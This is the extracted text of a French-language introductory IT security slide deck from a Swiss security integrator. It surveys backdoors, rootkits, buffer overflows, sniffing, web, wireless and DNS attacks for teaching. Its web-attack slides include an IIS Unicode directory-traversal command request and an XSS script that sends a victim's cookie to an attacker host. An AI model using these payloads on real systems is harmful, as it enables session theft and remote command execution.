![Page 93: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/93.jpg)
Solutions à la clef
Backdoor
Programme malicieux permettant le contrôle total d’une machine
Fonctionalités Capture écran, clavier, caméra, carte son Transfert de fichiers Capture des mots de passe Registry Exécution de programme Pop up Sniffer, connexion réseau Support de Plug-In Etc.
![Page 94: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/94.jpg)
Solutions à la clef
Backdoor classique: mode de connexion
Source: SensePost 2002
![Page 95: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/95.jpg)
Solutions à la clef
Backdoor classique: firewall
Source: SensePost 2002
![Page 96: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/96.jpg)
Solutions à la clef
Backdoor évoluée
Source: SensePost 2002
![Page 97: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/97.jpg)
Solutions à la clef
Un réseau « typique »
Source: SensePost 2002
![Page 98: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/98.jpg)
Solutions à la clef
Backdoor: utilisation de IE (http/ https)
Source: SensePost 2002
![Page 99: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/99.jpg)
Solutions à la clef
Key logger
Famille des « Malware » ou « SpyWare » Permet d’enregistrer toutes les touches du clavier Envoie des informations par:
Mail FTP HTTP Etc.
Invisible sur la machine pour un utilisateur « standard »
Disponible en logiciel commercial…
![Page 100: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/100.jpg)
Solutions à la clef
Exemple de Key Logger
![Page 101: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/101.jpg)
Solutions à la clef
Evolution des virus: 1988-2002
Source: F-Secure 2001
![Page 102: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/102.jpg)
Solutions à la clef
Messagerie SMTP
Remote SMTP Server Detection Attaque basée sur une vulnérabilité (DoS, BoF, Root
exploit, etc.) Relais de messagerie Usurpation d’identité Spoofing de mail Protocole SMTP
Protocole non sécurisé Atteinte à l’intégrité des messages Atteinte à la confidentialité des messages
Spam (mail bomber, publicité, etc.)
![Page 103: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/103.jpg)
Solutions à la clef
Atteinte à la confidentialité: exemple avec une Backdoor
Personne APersonne B
SMTP Serveur de messagerie
Black Hat
Backdoorinvisible
POP3
![Page 104: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/104.jpg)
Solutions à la clef
Atteinte à l’intégrité: exemple avec une attaque sur les DNS
Hacker
Modification du mail
Changement des MX Record
![Page 105: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/105.jpg)
Solutions à la clef
Compromission système
L’idée est de prendre le contrôle complet de la machine au niveau de son système d’exploitation
Les cibles sont des machines mal configurées ou/et non « patchées »
Microsoft Unix / Linux etc.
![Page 106: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/106.jpg)
Solutions à la clef
Compromission système
L’accès permet: Examiner des informations confidentielles Altérer ou détruire des données Utiliser des ressources systèmes Ecouter le traffic sur le réseau local Effectuer des DoS Lancer des attaques vers d’autres systèmes
![Page 107: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/107.jpg)
Solutions à la clef
Compromission système: scénario classique d’attaque
Source: CERT 2001
![Page 108: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/108.jpg)
Solutions à la clef
Compromission système
Après la compromission du système: Effacement des fichiers de « logs » Inspection de la machine
FIA, etc Installation d’une « Back Door » Installation d’un « Root Kit » Installation de logiciels d’attaques
Outils d’attaques « ARP » Un sniffer de mot de passe Un scanner Etc.
![Page 109: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/109.jpg)
Solutions à la clef
Root Kit
Kit de programmes pour dissimuler les traces sur une machine et garder le contrôle de la machine (Root)
Environnement Unix et Microsoft Root Kit Unix
Remplacement des commandes: ls, ps, netstat, top, su, tcpd, ssh, etc.
Cacher certains fichiers Backdoor
Root Kit Microsoft Cache certains processsus Cache certains fichiers Cache certaines « Registries » Backdoor
![Page 110: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/110.jpg)
Solutions à la clef
Root Kit: les deux familles
Application Root Kit Root Kit conventionnel Remplacement des commandes Programme avec Backdoor
Kernel Root Kit Manipulation des « Call System » Très difficile à détecter
![Page 111: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/111.jpg)
Solutions à la clef
Root Kit: compromission d’autres systèmes
![Page 112: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/112.jpg)
Solutions à la clef
Buffer Overflow
![Page 113: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/113.jpg)
Solutions à la clef
Buffer Overflow: une menace très importante
B0F 60% des attaques (CERT 2002) Très puissant
Exécution de code hostile (très souvent avec privilèges)
Exploit local ou distant Extrêmement facile à utiliser
Tools pour « Script Kidies » (Exploit) Code Red et Nimda en 2001
B0F on ISAPI
![Page 114: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/114.jpg)
Solutions à la clef
Buffer Overflow: pourquoi existent ils ?
Mauvaise programmation Gestion des pointeurs Manipulation des « buffers »
Peu de contrôle du code (QA) Pas de tests des BoF
Pas de validation des « buffers » Limitation du nombre de caractères
Pas de design pensé sécurité Trop chère et trop lent
![Page 115: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/115.jpg)
Solutions à la clef
Buffer Overflow: objectif
Forcer l’exécution d’un code hostile dans le but de:
D’obtenir un accès Root ou équivalent Exécuter un D0S D’installer une backdoor De corrompre une machine Etc.
Pas de limite: dépend du code hostile et de l’imagination de son auteur
![Page 116: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/116.jpg)
Solutions à la clef
Buffer Overflow: démonstration
Source:Entercept 2002
![Page 117: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/117.jpg)
Solutions à la clef
Buffer Overflow: démonstration
Source:Entercept 2002
![Page 118: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/118.jpg)
Solutions à la clef
Buffer Overflow: démonstration
Source:Entercept 2002
![Page 119: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/119.jpg)
Solutions à la clef
Buffer Overflow: démonstration
Here is the “Call” instruction that tells the OS to jump to our SayHello subroutine
Source:Entercept 2002
![Page 120: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/120.jpg)
Solutions à la clef
Buffer Overflow: démonstration
This is where the program SHOULD return after executing SayHello: 0040D734
Source:Entercept 2002
![Page 121: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/121.jpg)
Solutions à la clef
Buffer Overflow: démonstration
The return address (00 40 D7 34) is now pushed onto the stack. Intel architectures are little-endian, so the address appears reversed:
34 D7 40 00
Source:Entercept 2002
![Page 122: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/122.jpg)
Solutions à la clef
Buffer Overflow: démonstration
The debugger has cleared the stack frame for us by filling it with CC bytes
Source:Entercept 2002
![Page 123: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/123.jpg)
Solutions à la clef
Buffer Overflow: démonstration
Now the strcpy() function is called.
The data supplied is copied into the buffer.
Source:Entercept 2002
![Page 124: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/124.jpg)
Solutions à la clef
Buffer Overflow: démonstration
Source:Entercept 2002
![Page 125: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/125.jpg)
Solutions à la clef
Buffer Overflow: démonstration
Source:Entercept 2002
![Page 126: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/126.jpg)
Solutions à la clef
Buffer Overflow: démonstration
Note the valid return address bytes:
34 D7 40 00
Source:Entercept 2002
![Page 127: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/127.jpg)
Solutions à la clef
Buffer Overflow: démonstration
When strcpy() is called, the malicious data is copied into the buffer and overflows it, overwriting the return address.
The bytes of the return address are now 35 39 34 35.
Source:Entercept 2002
![Page 128: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/128.jpg)
Solutions à la clef
Buffer Overflow: démonstration
Ou exécution d’un code hostile
Source:Entercept 2002
![Page 129: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/129.jpg)
Solutions à la clef
Buffer Overflow: How to be Root !
Code hostile
![Page 130: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/130.jpg)
Solutions à la clef
Découverte des mots de passe
Les approches Attaque par dictionnaire
Basée sur des fichiers de mots de passe Fichiers générique Fichiers thématiques
Attaque par « brute force » Essai de toutes les combinaisons
Attaque hybride Dictionnaire et « brute force »
![Page 131: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/131.jpg)
Solutions à la clef
Découverte des mots de passe: techniques
Obtention du fichier des mots de passe /etc/passwd - /etc/shadows (Unix) Fichier Sam Microsoft Etc.
Capture à l’aide d’un renifleur Microsoft NT 4.0 (NTLM) Telnet, FTP, ldap, etc.
Attaques par connexion Serveur Telnet, FTP, POP3, HTTP, etc Routeurs, Switchs, Appliance Main Frame ERP Etc.
![Page 132: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/132.jpg)
Solutions à la clef
Exemple de recherche de mots de passe
![Page 133: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/133.jpg)
Solutions à la clef
Exemple avec Windows 2000 (Kerberos)
![Page 134: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/134.jpg)
Solutions à la clef
Exemple avec Windows 2000 (Kerberos)
![Page 135: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/135.jpg)
Solutions à la clef
Les renifleurs (Sniffer)
Outils de capture du trafic réseau Utilisent la carte réseau en mode « promiscuous »
Les « Black Hat » les utilisent pour: Examiner le traffic entre plusieurs machines Capturer les mots de passe Examiner les emails Etc.
La plupart des applications sont en « claires » Telnet, FTP, POP3, ldap, http, rlogin, etc.
Un renifleur est pratiquement indétectable !
![Page 136: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/136.jpg)
Solutions à la clef
Exemple de sniffer Unix: dsniff
![Page 137: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/137.jpg)
Solutions à la clef
Les renifleurs (Sniffer): environnements « Switché »
Il est possible de renifler dans un environnement switché
Techniques utilisées MAC Attacks ARP Attacks Etc.
Source: Cisco 2002
![Page 138: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/138.jpg)
Solutions à la clef
MAC Attacks
MAC Flooding Corruption des tables
CAM Agit comme un HUB Utilisation d’un sniffer
Outils disponible sur Internet !
macof
Source: Cisco 2002
![Page 139: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/139.jpg)
Solutions à la clef
ARP attack: ARP Spoofing
Corruption des tables ARP à l’aide d’outils ARP n’offre pas de mécanisme de sécurité ! Méthode très simple Outils les plus connus
Dsniff by Dug Song Ettercap Hunt Arp-sk Etc.
![Page 140: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/140.jpg)
Solutions à la clef
Renifleur dans un environement « switché »
Réseau « switché »
ServeurCible
ClientCible
Attaque ARP
Attaque ARP
Flux Client-Serveur telnet
Flux Client-Serveurtelnet
RoutageRenifleur
![Page 141: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/141.jpg)
Solutions à la clef
Détournement de session: Hijacking
Man in the Midle
ServeurCible
ClientCible
SSH, Telnet, SSL, etc.
![Page 142: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/142.jpg)
Solutions à la clef
Détournement de session: protocoles sécurisés
Session SSLSession SSH
Attention, ces messages ne sont pas anodins !
![Page 143: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/143.jpg)
Solutions à la clef
Application Web
Application Web: application sofware qui est accessible à l’aide un navigateur en utilisant http et/ou https (ou un « user agent »
Si le service est TCP 80 ou TCP 443, il s’agit probablement d’une application Web
Application très sensible Mauvaise configuration Vulnérabilité Bugs Etc.
Nouvelle cible des "Black Hat" !
![Page 144: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/144.jpg)
Solutions à la clef
Application Web: architecture
Source:WhiteHat Security
2002
![Page 145: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/145.jpg)
Solutions à la clef
Application Web: la futilité du firewall
Source:WhiteHat Security
2002
![Page 146: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/146.jpg)
Solutions à la clef
Application Web: SSL sécurise mon site Web
Source:WhiteHat Security
2002
![Page 147: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/147.jpg)
Solutions à la clef
Application Web: les principales attaques
Vulnérabilités des serveurs Web IIS, Apache, I-Planet, etc.
Exécution de programme Buffer Overflow Back Door Escalade de privilèges SQL Cross Site Scripting Défiguration (Defacement) Etc.
![Page 148: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/148.jpg)
Solutions à la clef
Pourquoi la sécurité « classique » n’est plus suffisante ?
Les applications Web sont vulnérables Env. 80% des applications testées (FoundStone)
Les développeurs ne sont pas encore sensibilisés à la sécurité informatique
Encore trop d’erreurs Les hackers se focalisent sur les applications
Web Votre firewall classique est impuissant pour
prévenir les intrusions applicatives Vos sondes IDS peuvent « éventuellement »
détecter une attaque !
![Page 149: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/149.jpg)
Solutions à la clef
Votre firewall – votre meilleur ennemi
http / https
Html, Dhtml
XML, Soap, WSDL
.NET
Java, ActiveX, VBScript, etc.
* Pour les flux HTTP votre firewall =
* Firewall Classique filtrage niveau 3
![Page 150: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/150.jpg)
Solutions à la clef
Les différentes attaques des applications Web
HTTP / HTTPSPort 80 / 443
Client Web
Serveur Web
ApacheIIS
IplanetZeusEtc.
App. Web
XML, Soap, HTML,etc.
XML
DB
DB
Application Server
CGI,PHPEtc.
RMIIIOPXMLSoapetc.
SQLXMLJDBCetc.
•Injection de code SQL•Dénis de service•Etc.
•Mauvais contrôle des entrées utilisateur•Méta caractères•BoF•Etc.
•Interprétation des URLs•Mauvaise configuration•BoF•Unicode•Direct OS Command•Etc.
•Vol de session•MiM http•MiM SSL•Sniffing
•Cross Site Scripting•Code mobile
![Page 151: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/151.jpg)
Solutions à la clef
Interprétation des URLs
HTTPPort 80
Client Web Firewall Classique
Serveur Web
ApacheIIS
IplanetZeusEtc.
App. Web
XML, Soap, HTML,etc.
XML
DB
DB
Application Server
CGI,PHPEtc.
RMIIIOPXMLSoapetc.
SQLXMLJDBCetc.
http://fantasio.e-xpertsolutions.com:80/chemin/application.asp?a=toto&b=1234
![Page 152: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/152.jpg)
Solutions à la clef
Illustration avec IIS Unicode Exploit
Ancienne vulnérabilité du serveur IIS Exemple pédagogique
Permet d’exécuter des commandes sur le serveur IIS
Utilise les URL malformés pour « passer les commandes »
« Dot Dot » Unicode
![Page 153: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/153.jpg)
Solutions à la clef
Interprétation de commandes par les URLs
Serveur Web
Fantasio
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
![Page 154: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/154.jpg)
Solutions à la clef
Contrôle des données utilisateurs
La plupart des applications ne contrôlent pas les « Input »
Seulement un contrôle au niveau du client (navigateur) !
Les attaques possibles Insertion de code, XSS BoF (pas de contrôle de taille)
exécution de code malicieux Dépassement des quotas (transaction financière) Caractères dangereux:
! @ $ % ^ & * ( ) - _ + ` ~ \ | [ ] { } ; : ' " ? / , . > <
![Page 155: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/155.jpg)
Solutions à la clef
Illustration avec le Cross-Site Scripting (XSS)
Principe de l’attaque Attaquer les utilisateurs de l’application plutôt que
l’application elle-même L’attaquant peut provoquer l’envoi à la victime par le
site Web légitime d’une page hostile contenant des scripts ou des composants malveillants
Cette page est exécutée sur le poste de la victime dans le contexte du site Web d’origine
<A HREF=http://www.mabanque.com/<script> alert(‘Malicious code’)</script>">Click
Here</a>
![Page 156: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/156.jpg)
Solutions à la clef
Exemple: vol d’un cookie
<script>document.location=‘http://hackers.ch/cgi/cookie?’+document.cookie
</script>
Envoie du cookie vers le site hackers.ch
![Page 157: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/157.jpg)
Solutions à la clef
Exemple: Vol de session par XSS
Lien hostileMail, Page Web
Application Web
Application utilisateur WebExécution de code hostile
CGI Script
1
HackerLogin avec le cookie volé
2
3
4
5
![Page 158: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/158.jpg)
Solutions à la clef
Projet « Open Web Application Security Project (OWASP) »
http://www.owasp.org Publication top 10 des vulnérabilités
![Page 159: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/159.jpg)
Solutions à la clef
Defacement ou graffiti Web
![Page 160: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/160.jpg)
Solutions à la clef
Application Web: défiguration
Définition: changement des pages Web Applications Web sont des cibles très visibles Les "Black Hat" utilisent ces ressources pour:
Revendications Fun Vengeance Etc.
Partie visible de l’iceberg En pleine croissance…
http://www.attrition.org http://www.zone-h.org/en/defacements
![Page 161: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/161.jpg)
Solutions à la clef
Defacements: évolution dans le temps
![Page 162: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/162.jpg)
Solutions à la clef
Exemple de défiguration politique: « Egyptian Fighter »
Source:www.alldas.org
Août 2002
![Page 163: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/163.jpg)
Solutions à la clef
Techniques de défiguration
Changement des pages « Web » FTP Compromission du serveur Etc.
DNS redirection ou « poisoning » Piratage de domaine Corruption des « proxy caches » Etc.
![Page 164: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/164.jpg)
Solutions à la clef
Microsoft IIS
Beaucoup de failles de sécurité Top One (CERT) 60% des défigurations
Année 2001 ISAPI Buffer overflow (exécution de commande)
Code Red IIS Directory Traversal (Unicode)
« HTTP Request » malformées Installation backdoor, voir les fichiers, etc.
« Sample Code » Code Red et Nimda
13 Juillet 2001 et 18 septembre 2001
![Page 165: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/165.jpg)
Solutions à la clef
Microsoft IIS
Octobre 2001: Gartner Group recommande de trouver une alternative à IIS…
Microsoft promet une nouvelle version IIS ?
![Page 166: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/166.jpg)
Solutions à la clef
Réseaux Wireless
Grande popularité du réseau sans fils Coûts abordables Confort d’utilisation
La contre partie Gros problèmes de sécurité
Concerne les protocoles 802.11x (a, b et g) 802.11x défini une couche de protection:
WEP = Wired Equivalent Privacy Encryption rc4 Intégrité avec un CRC32
![Page 167: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/167.jpg)
Solutions à la clef
Réseaux Wireless: l’architecture classique
Source:NIST 2002
![Page 168: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/168.jpg)
Solutions à la clef
Réseaux Wireless: le problème
Environ 70% des entreprise n’utilisent pas le WEP
« Complexité » Performance
WEP est très vulnérable Difficultés d’implémentation Possible de « cracker » les clés en peu de temps
Rayonnement très important Possibilité de se connecter à distance (dans la rue par
exemple)
![Page 169: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/169.jpg)
Solutions à la clef
Réseaux Wireless: les attaques et les outils
Attaques passives Ecoute du trafic à distance (crypté ou pas)
Attaques actives Usurpation d’une station Vol de session Modification de trafic DoS Etc.
Les outils Un scanner 802.11x Un logiciel de Crackage WEP Un renifleur Etc.
![Page 170: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/170.jpg)
Solutions à la clef
Réseaux Wireless: le Warchalking
Interception des réseaux Wireless depuis la rue Marquage des sites à l’aide de symbole Partage de l’information sur les sites Internet
Coordonées GPS Etc.
![Page 171: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/171.jpg)
Solutions à la clef
Réseaux Wireless: le Warchalking et ces symboles de base
![Page 172: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/172.jpg)
Solutions à la clef
DNS: rappel
![Page 173: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/173.jpg)
Solutions à la clef
DNS: les attaques
Zone transfert Attaque de type Cache Poisoning
Changement des MX Record Changement des adresses IP Etc.
Vulnérabilités de type « Remote Root » Dépend de la version du « Bind » Processus DNS « tournant » Root
Compromission du système DNS
![Page 174: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/174.jpg)
Solutions à la clef
Autres attaques informatiques
Méthodes d’encapsulation UDP, TCP, ICMP L’art de passer des informations dans des protocoles
« friendly » Recherche des clés privées en mémoire
Technique de « Key Grab » Serveurs Web SSL, Messagerie S/Mime, PGP, etc.
Attaques sur la technologie PKI Changement des « Trusts » Etc.
![Page 175: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/175.jpg)
Solutions à la clef
Autres attaques informatiques
Attaques sur les smartcards, tokens USB Technologie USB
Renifleur USB Attaques sur réseaux Microsoft
Netbios (share) « Null Session Connection »
SNMP Attaques routeurs, switchs Et bien d’autres encore…
![Page 176: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/176.jpg)
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50
[email protected] | www.e-xpertsolutions.com
Questions ?
![Page 177: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/177.jpg)
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50
[email protected] | www.e-xpertsolutions.com
e-Xpert Solutions SAIntégrateur en sécurité informatique
Au bénéfice d'une longue expérience dans les secteurs financiers et industriels, e-Xpert Solutions SA propose à sa clientèle des solutions « clé en main » dans le domaine de la sécurité informatique des réseaux et des applications. Des solutions qui vont de la sécurité de périmètre – tel le firewall, VPN, IDS, FIA, le contrôle de contenu, l’anti-virus – aux solutions plus avant-gardistes comme la prévention des intrusions (approche comportementale), l'authentification forte, la biométrie, les architectures PKI ou encore la sécurisation des OS Unix, Microsoft et des postes clients (firewall personnel).
